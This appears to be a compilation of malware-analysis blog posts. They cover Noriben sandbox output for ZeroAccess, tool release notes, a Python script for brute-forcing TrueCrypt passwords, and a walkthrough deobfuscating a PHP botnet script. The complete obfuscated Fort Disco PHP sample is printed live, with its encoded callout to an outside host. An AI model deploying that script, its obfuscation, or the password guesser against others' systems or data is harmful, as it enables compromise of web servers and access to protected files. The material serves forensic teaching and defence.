Hehda.exe drops a few very interesting files, including:

[CreateFile] hehda.exe:2520 > C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\n  [MD5: cfaddbb43ba973f8d15d7d2e50c63476]
[CreateFile] hehda.exe:2520 > C:\RECYCLER\S-1-5-18\$fab110457830839344b58457ddd1f357\n [MD5: cfaddbb43ba973f8d15d7d2e50c63476]

Right away, a Google search on this MD5 value returns many results identifying the file as ZeroAccess. The filenames themselves are also indicative of ZeroAccess.

How did this file gain persistence on the victim machine? Now that we see the files, we can peruse the registry values and see the following items:

[CreateKey] hehda.exe:2520 > HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}
[CreateKey] hehda.exe:2520 > HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32
[SetValue] hehda.exe:2520 > HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32\ThreadingModel  =  Both
[SetValue] hehda.exe:2520 > HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32\(Default)  =  C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\n.

And what other damage did it do? Well, it looks like it took out a few notable services, including those for the Windows Firewall and Windows Security Center:

[SetValue] services.exe:680 > HKLM\System\CurrentControlSet\Services\SharedAccess\DeleteFlag  =  1
[SetValue] services.exe:680 > HKLM\System\CurrentControlSet\Services\SharedAccess\Start  =  4
[SetValue] services.exe:680 > HKLM\System\CurrentControlSet\Services\wscsvc\DeleteFlag  =  1
[SetValue] services.exe:680 > HKLM\System\CurrentControlSet\Services\wscsvc\Start  =  4

That is one nasty piece of work. But, it gets better when we get down to the network traffic:

[UDP] hehda.exe:2520 > google-public-dns-a.google.com:53
[UDP] google-public-dns-a.google.com:53 > hehda.exe:2520
[HTTP] hehda.exe:2520 > 50.22.196.70-static.reverse.softlayer.com:80
[TCP] 50.22.196.70-static.reverse.softlayer.com:80 > hehda.exe:2520
[UDP] hehda.exe:2520 > 83.133.123.20:53
[UDP] svchost.exe:1032 > 239.255.255.250:1900
[UDP] services.exe:680 > 206.254.253.254:16471
[UDP] services.exe:680 > 190.254.253.254:16471
[UDP] services.exe:680 > 182.254.253.254:16471
[UDP] services.exe:680 > 180.254.253.254:16471
[UDP] services.exe:680 > 135.254.253.254:16471
[UDP] services.exe:680 > 134.254.253.254:16471
[UDP] services.exe:680 > 117.254.253.254:16471
[UDP] services.exe:680 > 115.254.253.254:16471
[UDP] services.exe:680 > 92.254.253.254:16471
[UDP] services.exe:680 > 88.254.253.254.dynamic.ttnet.com.tr:16471
[UDP] services.exe:680 > 254.253.254.87.dynamic.monaco.mc:16471



The large list of IP addresses on UDP port 16471 is another big indicator for ZeroAccess. Upon doing open-source research, you'll find that the dropped file "@" is a list of IP addresses used to bootstrap the malware onto the botnet network. Additionally, we see a request to "50.22.196.70-static.reverse.softlayer.com", a known host for the MaxMind geolocation service API, giving the botnet owners a sense of where in the world your computer lies.

Conclusions / Post Analysis Mitigation


The goal of Noriben is to provide very quick and simple answers to your questions, whether for a more in-depth analysis of an infected system, a better understanding of a malware sample's capabilities without static analysis, or quickly crafting network filters to look for (and block) other infections. What files were created? What MD5s should I scan for? What network hosts and ports are being used? The plain-text report allows you to quickly see the data and copy/paste it into the relevant solution.

Noriben is not a turn-key solution. While the built-in filters will remove most innocuous items, the user will likely need to adjust and add new filters to remove additional benign entries. It's highly recommended to run Noriben in your VM against benign applications first and adjust the built-in filters to fit your particular operating system. Editing is extremely easy: just open Noriben.py in any text editor and add new items to the respective blacklist.
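As an example, new entries might look something like the following. This is only a sketch; the actual list names inside Noriben.py may differ, and the registry and file paths shown are just common sources of benign noise:

# Hypothetical list names -- check your copy of Noriben.py for the real ones.
# Anything matching these entries is treated as noise and dropped from the report.
reg_blacklist = [
    'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist',
    'HKLM\\SOFTWARE\\Microsoft\\Cryptography\\RNG\\Seed',
]
file_blacklist = [
    'C:\\Windows\\Prefetch\\',
    '%UserProfile%\\Recent\\',
]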

Noriben is hosted on GitHub

P.S. Why call it Noriben? Noriben (海苔弁) is a very simple Japanese lunch box. Noriben are plentiful in shops, provide your basic nourishment, and are a staple meal for a struggling family. It felt only appropriate to analogize it to Noriben.py, a very simple sandbox that provides basic indicators, can directly feed your security solutions, and fits easily within the budget of any organization.

P.P.S. If you have any errors or unusual items that you want to report, email the PML/CSV/TXT files (ZIP is fine) to brian -=[at]=- thebaskins -=[dot]=- com. Additionally, if you have any notable filter items that you would like to share, I will review them and, if helpful, add to the trunk with credit to you.
1 May 13: Rewritten to be forward compatible to Python 3.X. Works in both versions of Python now.
30 Apr 13: Regular Expression support implemented and working.
17 Apr 13: Major bug fixes in filters. Now dramatically reduces false positives.
16 Sep 13: Version 1.4 now lets you specify the malware on the cmdline and specify a timeout period to be more sandbox-like. It also has the feature of generalizing path to their relative environment variable. More on that here.

Noriben version 1.1 Released

I've made available the latest version of Noriben with some much-needed updates.

The greatest update is a series of added filters that dramatically reduce false-positive items in the output. These were missing from the first release due to an oversight on my part and an unknown usability feature in Procmon. I use my own personal Procmon filters for malware analysis, which are not provided for users to download. My mistake was assuming that removing this filter file would prevent Procmon from using it and would give me the output that everyone else would see. That was a wrong assumption; Procmon stores a backup of the filters in the registry.

After seeing the output produced when @TekDefense ran Noriben, I quickly realized the sheer amount of items that should not be in the report, and rushed to fix this.

While updating the filters, I applied a few new improvements under the hood in how filters are applied. Primarily, filters now support regular expressions, though I have not implemented any at this point. Additionally, filters can now include environment variables. So, instead of hard-coding "C:\Users\Brian\AppData\...", which would change on every single machine, a filter can read "%UserProfile%\AppData\...". This lends greater portability to the script, allowing the same filter set to be used on any machine with no changes.
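One way to make such filters portable is to normalize the paths seen in the Procmon output back to their environment-variable form before comparing. Roughly speaking, that boils down to something like the following sketch (an illustration of the idea, not Noriben's actual code):

import os

def generalize_path(path):
    # Replace user- and host-specific prefixes with their environment variable form.
    # Order matters: check the most specific variables first.
    for var in ('APPDATA', 'LOCALAPPDATA', 'USERPROFILE', 'PROGRAMFILES', 'WINDIR'):
        value = os.environ.get(var)
        if value and path.lower().startswith(value.lower()):
            return '%%%s%%%s' % (var, path[len(value):])
    return path

# 'C:\\Users\\Brian\\AppData\\Roaming\\foo.dll' -> '%APPDATA%\\foo.dll'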

The new version of Noriben, version 1.1, is available on GitHub here.

If you have any errors or unusual items that you want to report, email the PML/CSV/TXT files (ZIP is fine) to brian -=[at]=- thebaskins -=[dot]=- com. Additionally, if you have any notable filter items that you would like to share, I will review them and, if helpful, add to the trunk with credit to you.


Update (30 Apr 13): I made a gross failure in testing the Regular Expression feature in version 1.1. In short, it didn't work. That's been rectified, and it's working perfectly. I also added some guidance on how to create new rules, to meet the requirements of the regular expression parser.

Ghetto Forensics!

While I have maintained a blog on my personal website (www.thebaskins.com) for many years, the process of creating new posts on it has become cumbersome over time. As I wrote more technical posts, they felt out of place on a personal site. After some weeks of contemplation, I've forked my site to place my new technical content on a site of its own, here, at Ghetto Forensics.

Why Ghetto Forensics? Because this is the world in which we operate. For every security team operating under a virtually unlimited budget, there are a hundred cobbling together a team on a shoestring budget using whatever tools they can. This is the world I've become used to in my long career in security, where knowledgeable defenders make do as virtual MacGyvers: facing tough problems with a stick of bubble gum, a paperclip, and some Python code.

Many don't even realize they're in such a position. They've created an environment where they are continually on the ball and solving problems, until they are invited to a vendor demonstration pitching a $10,000 tool that does exactly what their custom script already performs. Where an encrypted file volume isn't met with price quotes, but with ideas such as "What if we just ran `strings` on the entire hard drive and tried each result as a password?".

Ghetto forensics involves using whatever is at your disposal to get through the day. Ghetto examiners don't have the luxury of spending money to solve a case, or buying new and elaborate tools. Instead, their focus is to survive the day as cheaply and efficiently as possible.

Have a tough problem? No EnScript available? Then work through five different, free tools, outputting the results from one to another, until you receive data that meets your demands. Stay on top of the tools, constantly reading blog posts and twitter feeds of others, to see what is currently available. Instead of swishing coffee in a mug while waiting for keyword indexing, having the luxury of weeks to perform an examination, you are multitasking and updating your procedures to go directly after the data that's relevant to answering the questions. Fix your environment so that you can foresee and tackle that mountain of looming threats instead of constantly being responsive to incidents months after the fact.

These are many of the ideals I've learned from and taught to others. While others adopted the mentality of posting questions to vendors and waiting for a response, we learned to bypass corporate products and blaze our own trails. When I helped develop a Linux Intrusions class in 2002, the goal was to teach how to investigate a fully-fledged network intrusion on a zero-dollar budget. We used Sleuthkit, Autopsy, and OpenOffice. We created custom timelines and used a free spreadsheet (Quattro) to perform filtering and color-coding. Students learned how to take large amounts of data and quickly cull it down to notable entries using grep, awk, and sed. And, when they returned to their home offices, they were running circles around their co-workers who relied upon commercial GUI applications. Their task became not finding which button to click, but determining what data they needed and how to extract it.

Join me as we celebrate Ghetto Forensics, where being a Ghetto Examiner is a measure of your ingenuity and endurance in a world where you can't even expense parking.

Presentation Archive


Below are a series of presentations I've given over the years, though not a fully inclusive list. Many are too sensitive (FOUO/LES/S/TS/SAP/EIEIO) to store, and others have been lost to digital decay. But, the remainder have been recovered and digitally remastered for your enjoyment.

Walking the Green Mile: How to Get Fired After a Security Incident:

Abstract: Security incidents targeting corporations are occurring on a daily basis. While we may hear about the large cases in the news, network and security administrators from smaller organizations quake in fear of losing their jobs after a successful attack on their network. Simple bad decisions and stupid mistakes in responding to a data breach or network intrusion are a great way to find yourself new employment. In this talk I'll show you, in twelve easy steps, how to do so after, or even during, a security incident in your company.
Notable Venues: Derbycon 1.0, Defcon Skytalks, BSides Las Vegas


Below is a video feed of the talk given at the first ever Derbycon. It was an early morning slot, and I was somehow blissfully unaware that I was being recorded, which may be why I feel it was the best recording of the talk.



Intelligence Gathering Over Twitter:

This was a basic-level presentation geared for a law enforcement audience. It taught the basics of how to use Twitter but also delved into specialized tools to collect and analyze large amounts of data, to help infer relationships and associations. This slide deck is slightly redacted, as much of the good stuff was given orally in the presentation.
Notable Venues: DoD Cyber Crime Conference


Information Gathering Over Twitter from Brian Baskin

Malware Analysis: Java Bytecode

Abstract: This was a short talk given to NoVA Hackers soon after working through a Zeus-related incident response. The JavaScript used to drop Zeus on the box had a few layers of obfuscation that I had not seen discussed publicly on the Internet. The talk was originally given unrecorded and only published a year later.



P2P Forensics: 

Abstract: Years ago I began working on an in-depth protocol analysis talk about BitTorrent so that traffic could be monitored. This grew into a BitTorrent forensics talk which grew into an overall P2P Forensics talk. At one point, it was a large two-hour presentation that I had to gently trim down to an hour. Given at multiple venues, each was modified to meet that particular audience (administrators, criminal prosecutors, military).
Notable Venues: GFIRST, DoD Cyber Crime Conference, DojoCon, Virginia State Police Cyber Workshop, USAF ISR Information Security Conference, USDoJ CCIPS Briefing, AFOSI Computer Crime Workshop



The only video recording of the talk, recorded at DojoCon 2010, for a technical audience.

Brian Baskin, @bbaskin P2P Forensics from Adrian Crenshaw on Vimeo.


Casual Cyber Crime:

Abstract: We're living in an age of devices and applications that push the boundaries of dreams, an age of instant gratification, but also the age of Digital Rights Management and Copyright laws. With questionably illegal modifications becoming simple enough for children to use, where does the line get drawn between squeezing more functionality out of your digital devices and software and breaking felony laws? In this talk attendees will explore the justifications and rationales behind the use of questionable hardware and software modifications and understand the mentality behind why their use is rapidly catching on in the general population.
Notable Venues: TechnoForensics


31337 Password Guessing

In digital forensics and incident response, we tend to deal with encrypted containers on a regular basis. Encrypted containers mean dealing with various styles and iterations of passwords used to access them. In a large-scale incident response, it's not uncommon to have a dedicated spreadsheet that just tracks which passwords open which volumes, with the spreadsheet itself password protected.

But, what happens when you forget that password?



The common problems I've run into have been trying to access a volume months, sometimes years, after the fact. In civil cases, we've been surprised to see a case resurface years after we thought it had been settled, and rushed back to open old archives. This inevitably leaves us asking "Did I use a zero or an `O` for that byte?"

By making a spreadsheet of every possible password permutation, we've always been able to get to the data, but the issue does occasionally pop up.

For instance, in an intrusion-related case, a case agent used their agency's forensics group to seize a laptop drive. The drive contained a user file encrypted with TrueCrypt. Through the telephone-game, the owner says the password is XooXooX, which the responder writes as xooxoox, which is transcribed by the case agent as X00x00x. Attempts to decrypt the volume fail, and being that the original responder has now moved on and no notes were kept, all we're told is that the password is "something like ....".

Reasonable and resourceful shops would then write custom password filters to throw into software like PRTK, using DNA clustering to quickly determine the password. However, you don't work in a reasonable and resourceful shop. You can't afford PRTK. What do you do? Write a password guesser in Python that just uses TrueCrypt.




TrueCrypt has a variety of command-line arguments to automatically mount images given a specified password:


With these in mind, we can craft a command-line argument to mount the volume, and rely upon TrueCrypt's return code (0 or 1) to tell us if the mount was successful or not.

Take the case of an agent who says: "The password is Volleyball. We know the first letter is capitalized, and the rest is in leet speak." Based on this, I write a leet-speak character substitution routine:


def leet_lookup(char):
    list = {"a": ["a", "A", "@"],
            "b": ["b", "B", "8"],
            "c": ["c", "C", "<"],
            "e": ["e", "E", "3"],
            "i": ["i", "I", "1"],
            "l": ["l", "L", "1"],
            "o": ["o", "O", "0"],
            "t": ["t", "T", "7"]}
    try:
        result = list[char.lower()]
    except KeyError:
        result = [char.lower(), char.upper()]
    return result


This little routine lets us create a list of possible substitutions for each byte value. If the specified byte isn't declared, it just returns the upper and lower case version of it.

Now, we put this into action here:

import os
import subprocess

tc_exe = "C:\\Program Files\\TrueCrypt\\truecrypt.exe"
tc_file = "E:\\test.tlc"
drive_letter = "P"

def leet_lookup(char):
    list = {"a": ["a", "A", "@"],
            "b": ["b", "B", "8"],
            "c": ["c", "C", "<"],
            "e": ["e", "E", "3"],
            "i": ["i", "I", "1"],
            "l": ["l", "L", "1"],
            "o": ["o", "O", "0"],
            "t": ["t", "T", "7"]}
    try:
        result = list[char.lower()]
    except KeyError:
        result = [char.lower(), char.upper()]
    return result

list = []
# V o l l e y b a l l = 10 chars
for c1 in leet_lookup('v'):
    for c2 in leet_lookup('o'):
        for c3 in leet_lookup('l'):
            for c4 in leet_lookup('l'):
                for c5 in leet_lookup('e'):
                    for c6 in leet_lookup('y'):
                        for c7 in leet_lookup('b'):
                            for c8 in leet_lookup('a'):
                                for c9 in leet_lookup('l'):
                                    for c10 in leet_lookup('l'):
                                        list.append("%s%s%s%s%s%s%s%s%s%s" % (c1, c2, c3, c4, c5, c6, c7, c8, c9, c10))
print "%d passwords calculated. Now testing:" % len(list)

count = 0
for password in list:
    count += 1
    if not count % 10: print ".",
    tc_cmdline = "%s %s /l %s /b /a /m ro /q /s /p %s" % (tc_exe, tc_file, drive_letter, password)
    process = subprocess.Popen(tc_cmdline)
    returncode = process.wait()
    if not returncode:
        close_cmdline = "%s /d /l %s /q /s" % (tc_exe, drive_letter)
        process = subprocess.Popen(close_cmdline).wait()
        print "\r\nPassword found: %s" % password
        quit()

The main portion is where we specify the 10 characters of Volleyball (which I'm sure could be written cleaner with a Python lambda, but ain't nobody got time for that). This script will try every permutation of Volleyball against a file named "E:\test.tlc", mounting it to drive letter "P:" if successful.
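For the curious, those nested loops could also be collapsed with itertools.product; a rough equivalent (reusing the leet_lookup() routine above) would be:

import itertools

word = 'volleyball'
candidates = [''.join(combo)
              for combo in itertools.product(*[leet_lookup(c) for c in word])]
print('%d passwords calculated.' % len(candidates))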


In action, there were 26,244 possible permutations of the password, with a dot written for every 10 tests. After 30 minutes of testing, the correct one was found to be:  V0ll3ybal1



A copy of this code can be found as a GitHub Gist at: https://gist.github.com/Rurik/5521081

Additionally, the same concept can be applied to other products, such as RAR or ZIP password archives.
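As a sketch of that idea against a ZIP archive, Python's built-in zipfile module will do the guessing for you (the archive name and guess list below are made up for illustration):

import zipfile

archive = zipfile.ZipFile('evidence.zip')             # hypothetical archive
test_name = archive.namelist()[0]                     # test against the first member

candidates = ['infected', 'Infected', 'V0ll3ybal1']   # hypothetical guess list
for password in candidates:
    try:
        archive.read(test_name, pwd=password.encode('ascii'))
        print('Password found: %s' % password)
        break
    except Exception:   # wrong password: RuntimeError, CRC, or decompression errors
        continue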

Noriben Version 1.2 released

In a mad rush of programming while on a plane to BSidesNOLA, and during the conference, I completed a large number of updates, requests, and demands for Noriben.

As a basic malware analysis sandbox, Noriben was already doing a great job in helping people analyze malware more quickly and efficiently. However, it had its bugs that hurt a few outlier cases. Using submitted feedback (through email, Twitter, in person, and death threats) I believe that the major issues have been fixed and that the most-needed features have been added.

New Improvements:

  • Timeline support -- Noriben now automatically generates a "_timeline.csv" report that notes all activity in chronological order, with fields for local time and a grouping category. Feedback is welcome for ways to improve this output. For example:
8:16:19,Network,UDP Send,hehda.exe,2520,83.133.123.20:53
8:16:19,File,CreateFolder,hehda.exe,2520,C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\L
8:16:19,File,CreateFolder,hehda.exe,2520,C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\U
8:16:19,File,CreateFile,hehda.exe,2520,C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\@,a7d89e4e5ae649d234e1c15da6281375
8:16:19,File,CreateFile,hehda.exe,2520,C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\n,cfaddbb43ba973f8d15d7d2e50c63476
8:16:19,Registry,RegCreateKey,hehda.exe,2520,HKCU\Software\Classes\clsid
8:16:19,Registry,RegCreateKey,hehda.exe,2520,HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}
8:16:19,Registry,RegCreateKey,hehda.exe,2520,HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32
8:16:19,Registry,RegSetValue,hehda.exe,2520,HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32\ThreadingModel,Both
8:16:19,Registry,RegSetValue,hehda.exe,2520,HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32\(Default),C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\n.
8:16:19,Registry,RegDeleteValue,hehda.exe,2520,HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Defender
  • Tracks registry deletion attempts -- Older versions only tracked successful deletions to the registry, assuming that the keys and values existed. Now, it logs even when the keys don't exist. This opened up a large amount of data that was previously filtered out, such as ZeroAccess removing the services for Windows Defender and Microsoft Update (which weren't running on my analysis VM).
  • Large CSV support -- The old versions of Noriben read the entire procmon CSV into memory and then parsed them for results. This created numerous Out of Memory issues with very large sample files. The new version fixes this by only reading in the data one line at a time.
  • Parse Procmon PMLs -- PML files are the binary database used to store the native events during capture. These are converted to CSVs during runtime, but a number of users have years worth of saved PMLs for previous malware samples. Now, Noriben can just parse an existing PML without having to re-run the malware.
  • Alternate Filter files -- Previous versions of Noriben required that you use one filter file, ProcmonConfiguration.PMC, to store your filters. This created issues for users who maintained multiple filters. A new command line option has been added to specify a filter file. This can be used in conjunction with the "-p" PML parsing option to rescan an existing PML with new filters.
  • Global Blacklists -- There was a need for a global blacklist, where items contained in it (namely executables) would be filtered across all categories. This allows a blacklisted item to apply everywhere without being manually added to each and every list. 
  • Error Logging -- In a few unusual cases, Noriben fails to parse an event item from the CSV. While Noriben contains proper error handling to catch these issues, it previously just dropped them and moved on. As these events may contain important items, they are now stored raw at the end of the Noriben text report for manual analysis. If something looks amiss, or the items are extremely important, the list can be emailed to me for analysis and better handling in future versions.
  • Compartmentalized sections -- This is mostly a back-end, minor feature: all events are now grouped into separate lists for Process, File, Registry, and Network. 

General fixes:

  • Changed the "open file" command for Mac OS X to 'open'. OS X is tagged as 'posix'. This allows Noriben to parse files from a Mac interface, but doing so is not recommended. Parsing files on a system other than the infected one means that system environment variables, such as %UserProfile%, will not be identified correctly.
Noriben has also changed its command line arguments, dropping '-r' (rescan CSV) and introducing more specific arguments for each file type: '-c' (CSV), '-p' (PML), and '-f' (filter):

--===[ Noriben v1.2 ]===--
--===[   @bbaskin   ]===--

usage: Noriben.py [-h] [-c CSV] [-p PML] [-f FILTER] [-d]

optional arguments:
  -h, --help                   show this help message and exit
  -c CSV, --csv CSV            Re-analyze an existing Noriben CSV file [input file]
  -p PML, --pml PML            Re-analyze an existing Noriben PML file [input file]
  -f FILTER, --filter FILTER   Alternate Procmon Filter PMC [input file]
  -d                           Enable debug tracebacks

How To: Static analysis of encoded PHP scripts

This week, Steve Ragan of CSO Online posted an article on a PHP-based botnet named by Arbor Networks as Fort Disco. As part of his analysis, Ragan posted an oddly obfuscated PHP script for others to tinker with, shown below:

<?$GLOBALS['_584730172_']=Array(base64_decode('ZXJy'.'b'.'3JfcmVw'.'b'.'3J0aW5n'),base64_decode('c'.'2V0X3RpbWV'.'fbGl'.'taXQ'.'='),base64_decode(''.'ZG'.'Vma'.'W'.'5l'),base64_decode(''.'ZGlyb'.'mFtZQ=='),base64_decode('ZGVm'.'aW5l'),base64_decode(''.'d'.'W5saW5r'),base64_decode('Zml'.'sZ'.'V9le'.'G'.'lzdHM='),base64_decode('dG91Y2'.'g='),base64_decode('aXNfd3J'.'p'.'dGFibGU='),base64_decode('dHJ'.'p'.'bQ=='),base64_decode('ZmlsZ'.'V9nZXRf'.'Y29udGVud'.'HM='),base64_decode('dW5s'.'aW5r'),base64_decode('Zm'.'lsZ'.'V9nZXRf'.'Y2'.'9u'.'dGVudHM='),base64_decode('d'.'W5'.'saW5r'),base64_decode('cH'.'JlZ19'.'tYX'.'Rj'.'aA=='),base64_decode('aW1wb'.'G9kZ'.'Q=='),base64_decode('cHJlZ19t'.'YXRja'.'A=='),base64_decode('a'.'W1w'.'bG9k'.'Z'.'Q=='),base64_decode('Zml'.'s'.'ZV'.'9nZXRfY'.'29'.'udGV'.'udH'.'M='),base64_decode('Z'.'m9w'.'ZW4='),base64_decode(''.'ZmxvY'.'2'.'s'.'='),base64_decode('ZnB1'.'dH'.'M='),base64_decode('Zmx'.'vY'.'2s'.'='),base64_decode('Zm'.'Nsb3'.'Nl'),base64_decode('Z'.'mlsZV9leG'.'lzdH'.'M='),base64_decode('dW5zZX'.'JpYWx'.'pemU='),base64_decode('Z'.'mlsZV9nZXRfY29udGVu'.'dHM='),base64_decode('dGlt'.'ZQ'.'='.'='),base64_decode('Zm'.'ls'.'Z'.'V9n'.'ZX'.'RfY29'.'ud'.'GVu'.'dHM='),base64_decode('d'.'GltZ'.'Q=='),base64_decode('Zm9w'.'ZW4='),base64_decode('Zmx'.'vY2s='),base64_decode(''.'ZnB1dHM='),base64_decode('c2VyaWFsaX'.'pl'),base64_decode('Zm'.'xvY2s='),base64_decode('ZmNsb'.'3N'.'l'),base64_decode('c'.'3Vic3Ry'),base64_decode(''.'a'.'GVhZGVy'),base64_decode('aGVhZGV'.'y'));?><?function_1348942592($i){$a=Array('aHR0cDovL2dheWxlZWNoZXIuY29tOjgx','cXdlMTIz','cXdlMTIz','MTIzcXdl','Uk9PVA==','Lw==','TE9H','b2xvbG8udHh0','L2lmcmFtZS50eHQ=','dGVzdA==','d29yaw==','Tk8gV09SSywgTk9UIEdFVCBVUkw=','Tk8gV09SSywgTk9UIFdSSVRJQkxF','YWFh','YWFh','YWFh','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','YmJi','YmJi','Y2Nj','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','TnVsbCBjb3VudCBvaw==','RVJST1IgbnVsbCBjb3VudCgo','SFRUUF9VU0VSX0FHRU5U','TVNJRQ==','RmlyZWZveA==','T3BlcmE=','V2luZG93cw==','Lw==','fA==','L2k=','SFRUUF9VU0VSX0FHRU5U','Lw==','fA==','L2k=','SFRUUF9VU0VSX0FHRU5U','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','dw==','L2lmcmFtZTIudHh0','aHR0cDovL3lhLnJ1Lw==','c2V0dGluZ3MuanNvbg==','c2V0dGluZ3MuanNvbg==','bGFzdA==','dXJs','bGFzdA==','dXJs','bGFzdA==','c2V0dGluZ3MuanNvbg==','dw==','dXJs','dXJs','aHR0cA==','aHR0cDovLw==','Lw==','SFRUUC8xLjEgNDA0IE5vdCBGb3VuZA==');returnbase64_decode($a[$i]);}?><?php$GLOBALS['_584730172_'][0](round(0));$GLOBALS['_584730172_'][1](round(0));$_0=_1348942592(0);if(isset($_GET[_1348942592(1)])AND$_GET[_1348942592(2)]==_1348942592(3)){$GLOBALS['_584730172_'][2](_1348942592(4),$GLOBALS['_584730172_'][3](__FILE__)._1348942592(5));$GLOBALS['_584730172_'][4](_1348942592(6),ROOT._1348942592(7));@$GLOBALS['_584730172_'][5](LOG);if(!$GLOBALS['_584730172_'][6](LOG)){@$GLOBALS['_584730172_'][7](LOG);if($GLOBALS['_584730172_'][8](LOG)AND$GLOBALS['_584730172_'][9]($GLOBALS['_584730172_'][10]($_0._1348942592(8)))==_1348942592(9)){@$GLOBALS['_584730172_'][11](LOG);echo_1348942592(10);}else{echo_1348942592(11);}}else{echo_1348942592(12);}exit;}if(isset($_GET[_1348942592(13)])AND$_GET[_1348942592(14)]==_1348942592(15)){$_1=$GLOBALS['_584730172_'][12]($_SERVER[_1348942592(16)]._1348942592(17));echo$_1;exit;}if(isset($_GET[_1348942592(18)])AND$_GET[_1348942592(19)]==_1348942592(20)){if($GLOBALS['_584730172_'][13]($_SERVER[_1348942592(21)]._1348942592(22))){echo_1348942592(23);}else{echo_1348942592(24);}exit;}if(!empty($_SERVER[_1348942592(25)])){$_2=array(_1348942592(26),_13
48942592(27),_1348942592(28));$_3=array(_1348942592(29));if($GLOBALS['_584730172_'][14](_1348942592(30).$GLOBALS['_584730172_'][15](_1348942592(31),$_2)._1348942592(32),$_SERVER[_1348942592(33)])){if($GLOBALS['_584730172_'][16](_1348942592(34).$GLOBALS['_584730172_'][17](_1348942592(35),$_3)._1348942592(36),$_SERVER[_1348942592(37)])){$_4=@$GLOBALS['_584730172_'][18]($_SERVER[_1348942592(38)]._1348942592(39));if($_4==_1348942592(40)or$_4==false)$_4=round(0);$_5=@$GLOBALS['_584730172_'][19]($_SERVER[_1348942592(41)]._1348942592(42),_1348942592(43));@$GLOBALS['_584730172_'][20]($_5,LOCK_EX);@$GLOBALS['_584730172_'][21]($_5,$_4+round(0+1));@$GLOBALS['_584730172_'][22]($_5,LOCK_UN);@$GLOBALS['_584730172_'][23]($_5);$_6=$_0._1348942592(44);$_7=round(0+300);$_8=_1348942592(45);if(!$_6)exit();$_9=$GLOBALS['_584730172_'][24](_1348942592(46))?$GLOBALS['_584730172_'][25]($GLOBALS['_584730172_'][26](_1348942592(47))):array(_1348942592(48)=>round(0),_1348942592(49)=>$_8);if($_9[_1348942592(50)]<$GLOBALS['_584730172_'][27]()-$_7){if($_9[_1348942592(51)]=$GLOBALS['_584730172_'][28]($_6)){$_9[_1348942592(52)]=$GLOBALS['_584730172_'][29]();$_10=$GLOBALS['_584730172_'][30](_1348942592(53),_1348942592(54));$GLOBALS['_584730172_'][31]($_10,LOCK_EX);$GLOBALS['_584730172_'][32]($_10,$GLOBALS['_584730172_'][33]($_9));$GLOBALS['_584730172_'][34]($_10,LOCK_UN);$GLOBALS['_584730172_'][35]($_10);}}$_11=$_9[_1348942592(55)]?$_9[_1348942592(56)]:$_8;if($GLOBALS['_584730172_'][36]($_11,round(0),round(0+1+1+1+1))!=_1348942592(57))$_11=_1348942592(58).$_11._1348942592(59);$GLOBALS['_584730172_'][37]("Location: $_11");exit;}}}$GLOBALS['_584730172_'][38](_1348942592(60));?>

As a fan of obfuscation, this clearly piqued my interest. The initial question was what was contained within all of the Base64 sections, but let's examine this holistically. At a high level, there are three distinct sections to this code block, with the beginning of each underlined in the code above. Each can also be identified as beginning with "<?".




The "<? $GLOBALS['_584730172_']" section creates an array of multiple Base64-encoded function values. As each item is called by the code, base64_decode will run on its value and return actual text. By hand picking a few of these to test, they all return known PHP function names:
base64_decode('ZXJy'.'b'.'3JfcmVw'.'b'.'3J0aW5n') resolves to "error_reporting"
base64_decode('c'.'2V0X3RpbWV'.'fbGl'.'taXQ'.'=') resolves to "set_time_limit"
The actual Base64-encoded values are further obfuscated by breaking up each string into multiple segments and rejoining them with the PHP "." concatenation operator. As many stateful inspection devices may block PHP that contains a call to "preg_match", bad guys will normally Base64 encode it. But devices can also search for the Base64 values of bad calls. So, to avoid this, the obfuscator code (not seen here) will randomly break up the text into chunks that are difficult for an automated device to piece back together.
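You can verify this against the sample itself. Re-joining the chunks for one of those calls and decoding them, here in Python, returns the keyword the attacker was hiding:

import base64

# The exact chunks from the obfuscated PHP above
chunks = ['cH', 'JlZ19', 'tYX', 'Rj', 'aA==']
print(base64.b64decode(''.join(chunks)))   # -> preg_match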

Knowing that the "$GLOBALS['_584730172_']" resolves function names, we can analyze it in code with context. "$GLOBALS['_584730172_'][0]" will extract the first function name from the array ("error_reporting") and execute it in-place. We know that we need to just replace these calls with their actual Base64 decoded values. This can be done manually, but we'll do it automatically later.

The second section of the code is a function:
<?function_1348942592($i){

This function does the same thing as "$GLOBALS['_584730172_']", but in a different manner. When passed a number, the function finds its corresponding value in an array and Base64 decodes it. When looking through these we see that they're the string values associated with the code:
'aHR0cDovL2dheWxlZWNoZXIuY29tOjgx' resolves to "http://gayleecher.com:81"
'cXdlMTIz' resolves to "qwe123"

We see these strings substituted within the code as function calls like:
$_0=_1348942592(0);

Just as with the function names, we'll want to replace these calls with their respective strings in the code. 

